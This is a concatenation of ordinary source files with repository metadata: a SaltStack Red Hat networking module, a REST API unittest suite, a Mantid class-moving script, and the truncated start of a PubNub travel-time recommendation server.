    for opt in opts:
        if opt not in ['networking', 'hostname', 'nozeroconf']:
            result[opt] = opts[opt]
    return result
def _raise_error_iface(iface, option, expected):
    '''
    Log a formatted interface-option error and raise it as AttributeError.
    '''
    message = _error_msg_iface(iface, option, expected)
    log.error(message)
    raise AttributeError(message)
def _raise_error_network(option, expected):
    '''
    Log a formatted network-settings error and raise it as AttributeError.
    '''
    message = _error_msg_network(option, expected)
    log.error(message)
    raise AttributeError(message)
def _raise_error_routes(iface, option, expected):
    '''
    Log a formatted route-settings error and raise it as AttributeError.
    '''
    message = _error_msg_routes(iface, option, expected)
    log.error(message)
    raise AttributeError(message)
def _read_file(path):
    '''
    Return the contents of *path* as a list of lines with newline
    characters stripped. Returns an empty list when the file cannot
    be read, for type consistency.
    '''
    try:
        with salt.utils.fopen(path, 'rb') as contents:
            # splitlines() drops the newline characters. See
            # http://stackoverflow.com/questions/12330522/reading-a-file-without-newlines
            lines = contents.read().splitlines()
    except Exception:
        return []
    # Drop a single leading empty line, if any (list.remove only raises
    # ValueError, which we deliberately ignore).
    try:
        lines.remove('')
    except ValueError:
        pass
    return lines
def _write_file_iface(iface, data, folder, pattern):
    '''
    Write *data* to folder/pattern.format(iface).

    Raises AttributeError when *folder* does not exist.
    '''
    filename = os.path.join(folder, pattern.format(iface))
    if not os.path.exists(folder):
        msg = '{0} cannot be written. {1} does not exist'
        msg = msg.format(filename, folder)
        log.error(msg)
        raise AttributeError(msg)
    # BUGFIX: use a context manager so the file handle is closed even if
    # write() raises (the open/close pair leaked the handle on error).
    with salt.utils.fopen(filename, 'w') as fout:
        fout.write(data)
def _write_file_network(data, filename):
    '''
    Write *data* to *filename*, replacing any existing contents.
    '''
    # BUGFIX: use a context manager so the file handle is closed even if
    # write() raises (the open/close pair leaked the handle on error).
    with salt.utils.fopen(filename, 'w') as fout:
        fout.write(data)
def _read_temp(data):
    '''
    Split *data* into a list of lines, dropping a single empty line if
    present (mirrors _read_file so test-mode output matches file output).
    '''
    lines = data.splitlines()
    if '' in lines:
        lines.remove('')
    return lines
def build_bond(iface, **settings):
    '''
    Create a bond script in /etc/modprobe.d with the passed settings
    and load the bonding kernel module.

    If settings contains a truthy 'test' entry, the rendered contents
    are returned without being read back from disk.

    CLI Example:

    .. code-block:: bash

        salt '*' ip.build_bond bond0 mode=balance-alb
    '''
    rh_major = __grains__['osrelease'][:1]
    opts = _parse_settings_bond(settings, iface)
    try:
        template = JINJA.get_template('conf.jinja')
    except jinja2.exceptions.TemplateNotFound:
        log.error('Could not load template conf.jinja')
        return ''
    data = template.render({'name': iface, 'bonding': opts})
    _write_file_iface(iface, data, _RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface))
    path = os.path.join(_RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface))
    if rh_major == '5':
        # RHEL5 keeps module options in /etc/modprobe.conf; drop any stale
        # alias/options lines for this interface before appending ours.
        __salt__['cmd.run'](
            'sed -i -e "/^alias\\s{0}.*/d" /etc/modprobe.conf'.format(iface),
            python_shell=False
        )
        __salt__['cmd.run'](
            'sed -i -e "/^options\\s{0}.*/d" /etc/modprobe.conf'.format(iface),
            python_shell=False
        )
        __salt__['file.append']('/etc/modprobe.conf', path)
    __salt__['kmod.load']('bonding')
    # BUGFIX: 'test' is optional; settings['test'] raised KeyError when the
    # caller did not pass it (build_interface already guards this way).
    if settings.get('test'):
        return _read_temp(data)
    return _read_file(path)
def build_interface(iface, iface_type, enabled, **settings):
    '''
    Build an interface script for a network interface.

    iface      -- interface name (normalized to lower case)
    iface_type -- interface type; must be one of _IFACE_TYPES
    enabled    -- whether the interface should come up on boot
    settings   -- type-specific options; a truthy 'test' renders the
                  script without writing it to disk

    CLI Example:

    .. code-block:: bash

        salt '*' ip.build_interface eth0 eth <settings>
    '''
    # Fedora always uses the RHEL6-style ifcfg template, regardless of
    # its own release number.
    if __grains__['os'] == 'Fedora':
        rh_major = '6'
    else:
        rh_major = __grains__['osrelease'][:1]
    iface = iface.lower()
    iface_type = iface_type.lower()
    if iface_type not in _IFACE_TYPES:
        _raise_error_iface(iface, iface_type, _IFACE_TYPES)
    if iface_type == 'slave':
        settings['slave'] = 'yes'
        if 'master' not in settings:
            msg = 'master is a required setting for slave interfaces'
            log.error(msg)
            raise AttributeError(msg)
    if iface_type == 'vlan':
        settings['vlan'] = 'yes'
    if iface_type == 'bridge':
        # Bridge interfaces need brctl from bridge-utils.
        __salt__['pkg.install']('bridge-utils')
    if iface_type in ['eth', 'bond', 'bridge', 'slave', 'vlan', 'ipip', 'ib']:
        opts = _parse_settings_eth(settings, iface_type, enabled, iface)
        try:
            template = JINJA.get_template('rh{0}_eth.jinja'.format(rh_major))
        except jinja2.exceptions.TemplateNotFound:
            log.error(
                'Could not load template rh{0}_eth.jinja'.format(
                    rh_major
                )
            )
            return ''
        ifcfg = template.render(opts)
    # In test mode return the rendered script without touching disk.
    if 'test' in settings and settings['test']:
        return _read_temp(ifcfg)
    _write_file_iface(iface, ifcfg, _RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}')
    path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}'.format(iface))
    return _read_file(path)
def build_routes(iface, **settings):
    '''
    Build a route script for a network interface.

    IPv4 and IPv6 routes are split into separate route-IFACE and
    route6-IFACE scripts. A truthy 'test' in settings returns the
    rendered output without writing it.

    CLI Example:

    .. code-block:: bash

        salt '*' ip.build_routes eth0 <settings>
    '''
    template = 'rh6_route_eth.jinja'
    # BUGFIX: osrelease is a string; compare its major digit as an int.
    # The old "str < int" comparison was a TypeError on Py3 and never
    # true on Py2, so pre-RHEL6 hosts got the wrong template.
    if int(__grains__['osrelease'][0]) < 6:
        template = 'route_eth.jinja'
    log.debug('Template name: ' + template)
    iface = iface.lower()
    opts = _parse_routes(iface, settings)
    log.debug("Opts: \n {0}".format(opts))
    try:
        template = JINJA.get_template(template)
    except jinja2.exceptions.TemplateNotFound:
        log.error(
            'Could not load template {0}'.format(template)
        )
        return ''
    # Split the requested routes by address family.
    opts6 = []
    opts4 = []
    for route in opts['routes']:
        ipaddr = route['ipaddr']
        if salt.utils.validate.net.ipv6_addr(ipaddr):
            opts6.append(route)
        else:
            opts4.append(route)
    log.debug("IPv4 routes:\n{0}".format(opts4))
    log.debug("IPv6 routes:\n{0}".format(opts6))
    routecfg = template.render(routes=opts4)
    routecfg6 = template.render(routes=opts6)
    # BUGFIX: 'test' is optional; settings['test'] raised KeyError when the
    # caller did not pass it.
    if settings.get('test'):
        routes = _read_temp(routecfg)
        routes.extend(_read_temp(routecfg6))
        return routes
    _write_file_iface(iface, routecfg, _RH_NETWORK_SCRIPT_DIR, 'route-{0}')
    _write_file_iface(iface, routecfg6, _RH_NETWORK_SCRIPT_DIR, 'route6-{0}')
    path = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route-{0}'.format(iface))
    path6 = os.path.join(_RH_NETWORK_SCRIPT_DIR, 'route6-{0}'.format(iface))
    routes = _read_file(path)
    routes.extend(_read_file(path6))
    return routes
def down(iface, iface_type):
    '''
    Shutdown a network interface

    CLI Example:

    .. code-block:: bash

        salt '*' ip.down eth0
    '''
    if iface_type in ['slave']:
        # Slave devices are controlled by the master.
        return None
    return __salt__['cmd.run']('ifdown {0}'.format(iface))
def get_bond(iface):
    '''
    Return the content of a bond script

    CLI Example:

    .. code-block:: bash

        salt '*' ip.get_bond bond0
    '''
    return _read_file(os.path.join(_RH_NETWORK_CONF_FILES, '{0}.conf'.format(iface)))
def get_interface(iface):
    '''
    Return the contents of an interface script

    CLI Example:

    .. code-block:: bash

        salt '*' ip.get_interface eth0
    '''
    return _read_file(os.path.join(_RH_NETWORK_SCRIPT_DIR, 'ifcfg-{0}'.format(iface)))
def up(iface, iface_type):  # pylint: disable=C0103
    '''
    Start up a network interface

    CLI Example:

    .. code-block:: bash

        salt '*' ip.up eth0
    '''
    if iface_type in ['slave']:
        # Slave devices are controlled by the master.
        return None
    return __salt__['cmd.run']('ifup {0}'.format(iface))
def get_routes(iface):
    '''
    Return the contents of the interface routes script.

    Concatenates the IPv4 (route-IFACE) and IPv6 (route6-IFACE) scripts.

    CLI Example:

    .. code-block:: bash

        salt '*' ip.get_routes eth0
    '''
    contents = []
    for pattern in ('route-{0}', 'route6-{0}'):
        contents.extend(
            _read_file(os.path.join(_RH_NETWORK_SCRIPT_DIR, pattern.format(iface)))
        )
    return contents
def get_network_settings():
    '''
    Return the contents of the global network script.

    CLI Example:

    .. code-block:: bash

        salt '*' ip.get_network_settings
    '''
    # Delegate to the shared file reader; returns [] if the file is missing.
    return _read_file(_RH_NETWORK_FILE)
def apply_network_settings(**settings):
    '''
    Apply global network configuration.

    Optionally applies a hostname change ('apply_hostname') and either
    restarts the network service or merely warns that a reboot is
    required ('require_reboot').

    CLI Example:

    .. code-block:: bash

        salt '*' ip.apply_network_settings
    '''
    settings.setdefault('require_reboot', False)
    settings.setdefault('apply_hostname', False)

    # Optionally push the hostname change through the network module.
    hostname_res = True
    if settings['apply_hostname'] in _CONFIG_TRUE:
        if 'hostname' in settings:
            hostname_res = __salt__['network.mod_hostname'](settings['hostname'])
        else:
            log.warning(
                'The network state sls is trying to apply hostname '
                'changes but no hostname is defined.'
            )
            hostname_res = False

    if settings['require_reboot'] in _CONFIG_TRUE:
        log.warning(
            'The network state sls is requiring a reboot of the system to '
            'properly apply network configuration.'
        )
        res = True
    else:
        res = __salt__['service.restart']('network')

    return hostname_res and res
def build_network_settings(**settings):
    '''
    Build the global network script.

    A truthy 'test' in settings returns the rendered output without
    writing the file.

    CLI Example:

    .. code-block:: bash

        salt '*' ip.build_network_settings <settings>
    '''
    # Read current configuration and store default values
    current_network_settings = _parse_rh_config(_RH_NETWORK_FILE)
    # Build settings
    opts = _parse_network_settings(settings, current_network_settings)
    try:
        template = JINJA.get_template('network.jinja')
    except jinja2.exceptions.TemplateNotFound:
        log.error('Could not load template network.jinja')
        return ''
    network = template.render(opts)
    # BUGFIX: 'test' is optional; settings['test'] raised KeyError when the
    # caller did not pass it.
    if settings.get('test'):
        return _read_temp(network)
    # Write settings
    _write_file_network(network, _RH_NETWORK_FILE)
    return _read_file(_RH_NETWORK_FILE)
|
smallyear/linuxLearn
|
salt/salt/modules/rh_ip.py
|
Python
|
apache-2.0
| 36,314
|
import argparse
import unittest
import os
from api.api import Resource
# Argument parsing.
# BUGFIX: the option was registered as the single literal string
# '-v, --verbose', so neither -v nor --verbose actually worked; register
# the short and long forms separately. parse_known_args() (instead of
# parse_args()) ignores unittest's own CLI flags rather than aborting.
parser = argparse.ArgumentParser(description='MOO Technical Test - Code Test Two.',
                                 epilog="Support Contact: justin.albertyn@gmail.com")
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true')
args, _unknown_args = parser.parse_known_args()
class APITester(unittest.TestCase):
    """Functional tests for the ``users`` REST resource wrapper."""

    def test_list_attributes_about_user(self):
        """
        As a client of this API, I want to be able to:
            Get a list of the following attributes about
            a user
             * Name
             * Username
             * Email
             * Phone
             * Website
        """
        wanted = ["name", "username", "email", "phone", "website"]
        attribute_dict = Resource("users").get_attr_list_by_id("1", ["name", "username", "email", "phone", "website"])
        self.assertEqual(sorted(list(attribute_dict.keys())), sorted(wanted))

    def test_retrieve_invalid_user(self):
        """
        As a client of this API, I want to be able to:
            Get a 404 status code when retrieving the
            details of an invalid user
        """
        user_object = Resource("users").get_by_id("10000")
        self.assertEqual(user_object["response_code"], 404)

    def test_retrieve_valid_user(self):
        """
        As a client of this API, I want to be able to:
            Get a 200 status code when retrieving the
            details of a valid user
        """
        user_object = Resource("users").get_by_id("1")
        self.assertEqual(user_object["response_code"], 200)

    def test_create_new_user(self):
        """
        As a client of this API, I want to be able to:
            Create a new user
        """
        new_user = {
            'id': 10,
            'name': 'Justin Albertyn',
            'username': 'Jay',
            'email': 'justin.albertyn@gmail.com',
            'address': {
                'street': 'Diasy Lane',
                'suite': '30',
                'city': 'London',
                'zipcode': 'EC10 1FW',
                'geo': {'lat': '-37.3159', 'lng': '81.1496'},
            },
            'phone': '1-770-736-8031 x56442',
            'website': 'hildegard.org',
            'company': {
                'name': 'Madiba.tech',
                'catchPhrase': 'Happy Technology',
                'bs': 'We are technology',
            },
        }
        self.assertEqual(Resource("users").create(new_user), 201)

    def test_delete_user(self):
        """
        As a client of this API, I want to be able to:
            Delete a user
        """
        self.assertEqual(Resource("users").delete("1"), 200)

    def test_get_header_attr_list_for_user(self):
        """
        As a client of this API, I want to be able to:
            See the following fields in the header of a
            response when getting a list of users:
             * Cache-Control => public
             * Connection => keep-alive
             * Content-Type => application/json
        """
        wanted = ["Connection", "Cache-Control", "Content-Type"]
        attribute_dict = Resource("users").get_header_attr_list_for_resource(["Connection", "Cache-Control", "Content-Type"])
        self.assertEqual(sorted(list(attribute_dict.keys())), sorted(wanted))

    def test_update_valid_user(self):
        """
        As a client of this API, I want to be able to:
            edit/update a users details, expecting
            a succesful (200) HTTP response.
        """
        self.assertEqual(Resource("users").update('1', {'username': 'Jay'}), 200)

    def test_update_invalid_user(self):
        """
        As a client of this API, I want to be able to:
            recieve an HTTP response 404 (not found) when
            attempting to edit/update a user that does not
            exist.
        """
        self.assertEqual(Resource("users").update('1000', {'username': 'Jay'}), 404)
# Allow running the suite directly; delegates to unittest's CLI runner.
if __name__ == "__main__":
    unittest.main()
|
justin-albertyn/moo
|
api_tester.py
|
Python
|
mit
| 5,745
|
#!/usr/bin/env python
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
""" Utility for moving a class file to a different project."""
from __future__ import (absolute_import, division, print_function, unicode_literals)
import argparse
import datetime
import os
import re
import sys
from cmakelists_utils import *
#======================================================================
def move_one(subproject, classname, newproject, newclassname, oldfilename, newfilename, args):
    """Move one file and rewrite its include path, guard and namespace.

    subproject/newproject     -- source and destination subprojects
    classname/newclassname    -- old and new class names
    oldfilename/newfilename   -- full paths before/after the move
    args                      -- parsed CLI args (uses no_vcs,
                                 source_subfolder, dest_subfolder)

    Errors from the move command are printed, not re-raised.
    """
    try:
        # Move the file (via git unless --no-vcs was given).
        cmd = "mv " + oldfilename + " " + newfilename
        cmd = cmd.replace("\\", "/")
        if not args.no_vcs:
            cmd = "git " + cmd
        print("Running:", cmd)
        retval = os.system(cmd)
        if retval != 0:
            raise RuntimeError("Error executing cmd '{}'".format(cmd))
        with open(newfilename, 'r') as handle:
            text = handle.read()
        # Replace any includes of it
        text = text.replace("Mantid" + subproject + "/" + args.source_subfolder + classname + ".h",
                            "Mantid" + newproject + "/" + args.dest_subfolder + newclassname + ".h")
        # Replace the include guard
        old_guard = "MANTID_{}_{}_H_".format(subproject.upper(), classname.upper())
        new_guard = "MANTID_{}_{}_H_".format(newproject.upper(), newclassname.upper())
        text = text.replace(old_guard, new_guard)
        # Replace the namespace declaration
        text = text.replace("namespace " + subproject, "namespace " + newproject)
        # BUGFIX: write through a context manager; the old code never closed
        # the output handle, so the rewritten contents could stay unflushed.
        with open(newfilename, 'w') as handle:
            handle.write(text)
    except RuntimeError as err:
        print(err)
#======================================================================
def move_all(subproject, classname, newproject, newclassname, args):
    """Move the header, source and test files of a class between projects
    and update both projects' CMake lists.

    Honours args.force (overwrite), args.header / args.cpp / args.test
    (which files to move) and the source/dest subfolder options.
    """
    # Directory at base of each subproject
    basedir, header_folder = find_basedir(args.project, subproject)
    newbasedir, new_header_folder = find_basedir(args.project, newproject)

    headerfile = os.path.join(basedir, "inc/" + header_folder + "/" + args.source_subfolder + classname + ".h")
    sourcefile = os.path.join(basedir, "src/" + args.source_subfolder + classname + ".cpp")
    testfile = os.path.join(basedir, "test/" + classname + "Test.h")

    newheaderfile = os.path.join(newbasedir, "inc/" + new_header_folder + "/" + args.dest_subfolder + newclassname + ".h")
    newsourcefile = os.path.join(newbasedir, "src/" + args.dest_subfolder + newclassname + ".cpp")
    newtestfile = os.path.join(newbasedir, "test/" + args.dest_subfolder + newclassname + "Test.h")

    # BUGFIX: use args.force rather than the module-level 'overwrite'
    # global, which only exists when run as __main__ (importing this module
    # and calling move_all() raised NameError).
    if args.header and not args.force and os.path.exists(newheaderfile):
        print("\nError! Header file {} already exists. Use --force to overwrite.\n".format(newheaderfile))
        return
    if args.cpp and not args.force and os.path.exists(newsourcefile):
        print("\nError! Source file {} already exists. Use --force to overwrite.\n".format(newsourcefile))
        return
    if args.test and not args.force and os.path.exists(newtestfile):
        print("\nError! Test file {} already exists. Use --force to overwrite.\n".format(newtestfile))
        return

    print()
    if args.header:
        move_one(subproject, classname, newproject, newclassname, headerfile, newheaderfile, args)
    if args.cpp:
        move_one(subproject, classname, newproject, newclassname, sourcefile, newsourcefile, args)
    if args.test:
        move_one(subproject, classname, newproject, newclassname, testfile, newtestfile, args)

    # Update the cmake lists of both projects.
    remove_from_cmake(subproject, classname, args, args.source_subfolder)
    add_to_cmake(newproject, newclassname, args, args.dest_subfolder)
    # BUGFIX: the message said "removed to"; files are removed FROM the
    # source project's list.
    print(" Files were removed from Framework/{}/CMakeLists.txt !".format(subproject))
    print(" Files were added to Framework/{}/CMakeLists.txt !".format(newproject))
    print()
#======================================================================
if __name__ == "__main__":
    # Command-line interface: four positional identifiers plus flags that
    # control which files move and how.
    parser = argparse.ArgumentParser(description='Utility to move a Mantid class from one project to another. '
                                                 'Please note, you may still have more fixes to do to get compilation!')
    parser.add_argument('subproject', metavar='SUBPROJECT', type=str,
                        help='The subproject under Framework/; e.g. Kernel')
    parser.add_argument('classname', metavar='CLASSNAME', type=str,
                        help='Name of the class to move')
    parser.add_argument('newproject', metavar='NEWPROJECT', type=str,
                        help='Name of the project to which to move the class.')
    parser.add_argument('newclassname', metavar='NEWCLASSNAME', type=str,
                        help='Name of the new class.')
    parser.add_argument('--force', dest='force', action='store_const',
                        const=True, default=False,
                        help='Force overwriting existing files. Use with caution!')
    parser.add_argument('--no-vcs', dest='no_vcs', action='store_const', const=True,
                        default=False,
                        help='Can be used to move a class that is not yet under version control. Default: False')
    parser.add_argument('--no-header', dest='header', action='store_const',
                        const=False, default=True,
                        help="Don't move the header file")
    parser.add_argument('--no-test', dest='test', action='store_const',
                        const=False, default=True,
                        help="Don't move the test file")
    parser.add_argument('--no-cpp', dest='cpp', action='store_const',
                        const=False, default=True,
                        help="Don't move the cpp file")
    parser.add_argument('--source-subfolder', dest='source_subfolder',
                        default="",
                        help='The source is in a subfolder below the main part of the project, e.g. Geometry/Instrument.')
    parser.add_argument('--dest-subfolder', dest='dest_subfolder',
                        default="",
                        help='The destination is in a subfolder below the main part of the project, e.g. Geometry/Instrument.')
    parser.add_argument('--project', dest='project',
                        default="Framework",
                        help='The project in which this goes. Default: Framework. Can be MantidQt, Vates')
    args = parser.parse_args()

    # Convenience aliases; move_all() also reads these via args.
    subproject = args.subproject
    newproject = args.newproject
    classname = args.classname
    newclassname = args.newclassname
    overwrite = args.force

    # Make sure the subfolders end with a /
    if args.source_subfolder != "":
        if args.source_subfolder[-1:] != "/":
            args.source_subfolder += "/"
    if args.dest_subfolder != "":
        if args.dest_subfolder[-1:] != "/":
            args.dest_subfolder += "/"

    move_all(subproject, classname, newproject, newclassname, args)
|
mganeva/mantid
|
buildconfig/move_class.py
|
Python
|
gpl-3.0
| 7,196
|
import pymongo
from pymongo import MongoClient
import datetime
import pytz
import math
import time
import datetime
from pubnub import Pubnub
import threading
import logging
# PubNub API keys for the TTO channel (publish / subscribe).
pub_key ='pub-c-f2fc0469-ad0f-4756-be0c-e003d1392d43'
sub_key ='sub-c-4d48a9d8-1c1b-11e6-9327-02ee2ddab7fe'
# Server log file; everything below logs through the root logger.
LOG_FILENAME = 'TTO_serverlogs.log'
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG,format='%(asctime)s, %(levelname)s, %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
# Scheduling knobs: worker threads act when (current minute % g_minit) ==
# g_divCompare, then sleep g_sleepTime seconds (just under ten minutes).
g_minit = 10
g_sleepTime = 580
g_divCompare = 3
# Dictionaries and Lists to store the Data
client_data = {}  # per-client state, keyed by client UUID
beforeJourneyClientList = {}  # clients that confirmed a recommendation but have not departed yet
startedJourneyClientList = {}  # clients that reported their journey as started
commonClientIDList = []  # UUIDs currently in the pre-journey stage
commonStartedClientIDList = []  # UUIDs currently in the started-journey stage
# Route name -> [route timezone, theoretical travel time in seconds].
zone_ttimedct = {"NEWARK-EDISON":["US/Eastern",1719],"BROOKLYN-DENVILLE":["US/Eastern",2921],"MOUNTZION RADIOLOGY CENTER-SF GENERAL HOSPITAL":["US/Pacific",767]}
'''****************************************************************************************
Function Name : publish_handler (pubnub operation)
Description : Function used to publish the data to the client
Parameters : channel - UUID of the client
result - The result i.e., The dictionary contains recommendations or alerts
****************************************************************************************'''
def publish_handler(channel,result):
    """Publish *result* (a recommendation/alert dict) to the client's channel.

    Only publishes while the client's 'recommndsentproceed' flag is True.
    Retries a failed publish up to 3 times, then gives up silently (the
    failure is recorded in the log).

    Parameters:
        channel - UUID of the client (doubles as the pubnub channel name)
        result  - dict payload to deliver
    """
    try:
        if (client_data[channel]['recommndsentproceed'] == True):
            pbtry = 0
            while (pbtry<3):
                try:
                    pbreturn = pubnub.publish(channel = channel ,message =result,error=error)
                    if (pbreturn[0] == 1):
                        # delivered successfully
                        return None
                    elif(pbreturn[0] == 0):
                        logging.error("The publish return error %s for the client %s\n"%(pbreturn[1],channel))
                        pbtry+=1
                    else:
                        # FIX: an unknown return code previously fell through
                        # without touching pbtry, spinning this loop forever.
                        # Count it as a failed attempt instead.
                        pbtry+=1
                except Exception as error_pdhandler:
                    logging.error("The error_pdhandler Exception is %s,%s\n"%(error_pdhandler,type(error_pdhandler)))
                    pbtry+=1
        else:
            pass
    except Exception as pubhandlerError:
        # Also catches KeyError when the client is unknown to client_data.
        logging.error("The publish function Exception is %s,%s,%s\n"%(pubhandlerError,type(pubhandlerError),str(result)))
'''****************************************************************************************
Function Name : alertpublish_handler (pubnub operation)
Description : Function used to publish the data to the client
Parameters : channel - UUID of the client
result - The result i.e., The dictionary contains recommendations or alerts
****************************************************************************************'''
def alertpublish_handler(channel,result):
    """Publish an alert dict to the client, gated by 'alertsentproceed'.

    On a successful publish the client's 'alertsentproceed' flag is cleared
    so the same alert is not re-sent until the flag is raised again.
    Retries a failed publish up to 3 times.

    Parameters:
        channel - UUID of the client (doubles as the pubnub channel name)
        result  - dict payload to deliver
    """
    try:
        if (client_data[channel]['alertsentproceed'] == True):
            pbtry = 0
            while (pbtry<3):
                try:
                    pbreturn = pubnub.publish(channel = channel ,message =result,error=error)
                    if (pbreturn[0] == 1):
                        # delivered: suppress further alerts until re-armed
                        client_data[channel].update({"alertsentproceed":False})
                        return None
                    elif(pbreturn[0] == 0):
                        logging.error("The publish return error %s for the client %s\n"%(pbreturn[1],channel))
                        pbtry+=1
                    else:
                        # FIX: an unknown return code previously fell through
                        # without touching pbtry, spinning this loop forever.
                        # Count it as a failed attempt instead.
                        pbtry+=1
                except Exception as error_pdhandler:
                    logging.error("The alerterror_pdhandler Exception is %s,%s\n"%(error_pdhandler,type(error_pdhandler)))
                    pbtry+=1
        else:
            pass
    except Exception as alertpubhandlerError:
        # Also catches KeyError when the client is unknown to client_data.
        logging.error("The alertpublish function Exception is %s,%s,%s\n"%(alertpubhandlerError,type(alertpubhandlerError),str(result)))
'''****************************************************************************************
Function Name : recommendationAlgoFunc (Algorithm operation)
Description : Function used to do the Algorithm
Parameters : DesiredArrivalTime - client's Desired ArrivalTime to the Destination
clientID - client's UUID
****************************************************************************************'''
def recommendationAlgoFunc(DesiredArrivalTime,clientID):
    """Compute departure-time recommendations for one client and publish them.

    Reads the 12-hour prediction table for the client's route from Mongo,
    offsets each prediction against the route's theoretical travel time
    (rounded to the nearest 10-minute slot), then walks the slots forward/
    backward from the Desired Arrival Time (DAT) looking for on-time, early
    and late departure options.  Results are pushed to the client via
    publish_handler; every failure path publishes a responseType 4 error.

    Parameters:
        DesiredArrivalTime - timezone-aware datetime the client wants to arrive
        clientID           - client UUID (key into client_data)

    NOTE(review): integer divisions below (diff.seconds/3600, diff.seconds/60)
    assume Python 2 truncating division — confirm if ever ported to Python 3.
    """
    try:
        global newttobackground
        proceed = False
        dateproceed = False
        # "Now" expressed in the route's own timezone.
        route_time = datetime.datetime.now(pytz.timezone(client_data[clientID]['timeZone']))
        theorytimeinsecs = client_data[clientID]['theoryTime']
        # TheoriticalTravelDuration(TTD)
        TheoriticalTravelDuration = theorytimeinsecs/60.0 #Theory time in minutes
        # ILLUSTRATION STEP 1 --> Round Off TTD to nearest 10min time interval by introducing offset
        if (TheoriticalTravelDuration%10 >= 5):
            # OFFSET VALUE
            rem = 10.0-TheoriticalTravelDuration%10
        else:
            rem = TheoriticalTravelDuration%10
            # OFFSET VALUE
            rem = -rem
        TimeDurationOffset = rem #(TDO)
        Limit = 1
        # All the mongolab operations are inside the try exception block
        try:
            # This is to get the latest date in the mongodb
            dateCursor = newttobackground.ttobgcoll.find({"route":client_data[clientID]['routeName']}).sort('recorddate', pymongo.DESCENDING).limit(Limit)
            for datedoc in dateCursor:
                endDate = datedoc['recorddate']
                dateproceed = True
        except Exception as e:
            dateproceed = False
            result = {"responseType":4,"message":"oops!! Internal problem"}
            publish_handler(clientID,result)
            logging.error("The dateCursor error is %s,%s\n"%(e,type(e)))
        if dateproceed == True:
            diff = DesiredArrivalTime-route_time
            day = diff.days
            # whole hours until the DAT (py2 truncating division)
            hour = (day*24 + diff.seconds/3600)
            realtimeinminutes = []
            # NOTE: this local list shadows the imported ``time`` module inside
            # this function; the module itself is not used here, so harmless.
            time = []
            # ILLUSTRATION STEP 2 --> Fetch 12hr advance prediction for the Selected Route
            try:
                #This is to get the predictions from the result collection
                cursor = newttobackground.ttoresultcoll.find({"route":client_data[clientID]['routeName']}).sort('time', pymongo.ASCENDING).limit(150)
                if (0<=hour <= 12 and 0<=day<=1):
                    proceed = True
                    for datadoc in cursor:
                        time.append(datadoc['time'].replace(second=0))
                        realtimeinminutes.append(datadoc['predictioninmins'])
                else:
                    # DAT outside the supported window: notify client, drop its state
                    if day < 0:
                        result = {"responseType":4,"message":"Desired Arrival Time is below 12 hours range"}
                    else:
                        result = {"responseType":4,"message":"Desired Arrival Time is more than 12 hours away"}
                    publish_handler(clientID,result)
                    proceed = False
                    del client_data[clientID]
            except Exception as e:
                logging.error("The testdatacursor error is %s,%s\n"%(e,type(e)))
                proceed = False
                result = {"responseType":4,"message":"oops!! Internal problem"}
                publish_handler(clientID,result)
            timediffinminutes = []
            # ILLUSTRATION STEP 3 --> Update all predicted time durations with the TDO value
            if (proceed == True):
                for j in realtimeinminutes:
                    timediffinminutes.append((((float(j)-(TheoriticalTravelDuration)))+TimeDurationOffset))
                DesiredArrivalTimeIndexInList = -1
                # Locate the prediction slot whose HH:MM equals the DAT's HH:MM.
                for i in range(len(time)):
                    if (int(DesiredArrivalTime.strftime("%H")) == int(time[i].strftime("%H")) and int(DesiredArrivalTime.strftime("%M")) == int(time[i].strftime("%M"))):
                        DesiredArrivalTimeIndexInList = time.index(time[i])
                try:
                    if DesiredArrivalTimeIndexInList != -1:
                        pred_minutes = []
                        # total predicted travel minutes per slot (offset re-applied)
                        for i in range(len(timediffinminutes)):
                            pred_minutes.append(float(timediffinminutes[i]+TheoriticalTravelDuration))
                        # ILLUSTRATION STEP 4 --> Handled as part of the overall flow of STEP 6
                        # ILLUSTRATION STEP 5 --> Calculate Recommendation Reference Start Time(RRST) from the DAT and TTD
                        RecommendationRefferenceStartTime = int(DesiredArrivalTimeIndexInList-((TheoriticalTravelDuration+TimeDurationOffset)/10))
                        i = RecommendationRefferenceStartTime
                        recommendationFlag = True
                        checkedOnce = []
                        recommendationResult = {}
                        listlen = len(time)
                        j = 0
                        # NOTE(review): i can step outside 0..len(time)-1 here; a
                        # resulting IndexError is swallowed by the except below.
                        while (recommendationFlag == True):
                            predictedArrivalTime = time[i]+datetime.timedelta(minutes=pred_minutes[i])
                            replaceapproach = predictedArrivalTime.replace(tzinfo=pytz.timezone(client_data[clientID]['timeZone']))
                            zone = pytz.timezone(client_data[clientID]["timeZone"])
                            predictedArrivalTime = zone.localize(predictedArrivalTime)
                            diff = DesiredArrivalTime - predictedArrivalTime
                            diff_minutes = (diff.days *24*60)+(diff.seconds/60)
                            # ILLUSTRATION STEP 6.3 --> Checking for the onTime
                            if (diff_minutes == 0): #This condition is the top priority
                                pred_minutesReal = pred_minutes[i]-TimeDurationOffset
                                # ILLUSTRATION STEP 6.3.1 --> Return the latest ontime recommendations to the user
                                recommendationResult.update({"onTime":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach ontime","pred_minutesReal":pred_minutesReal}})
                                recommendationFlag = False
                            # ILLUSTRATION STEP 6.6(Condition)--> Checking for the early
                            elif (0<=diff_minutes<=10):
                                pred_minutesReal = pred_minutes[i]-TimeDurationOffset
                                if(time[i] not in checkedOnce):
                                    checkedOnce.append(time[i])
                                    # ILLUSTRATION STEP 6.1,6.2 --> Derive the latest Recommendation
                                    recommendationResult.update({"Early":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) early"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}})
                                    # ILLUSTRATION STEP 6.6(Operation) --> Move RRST 10min Forward
                                    i+=1
                                else:
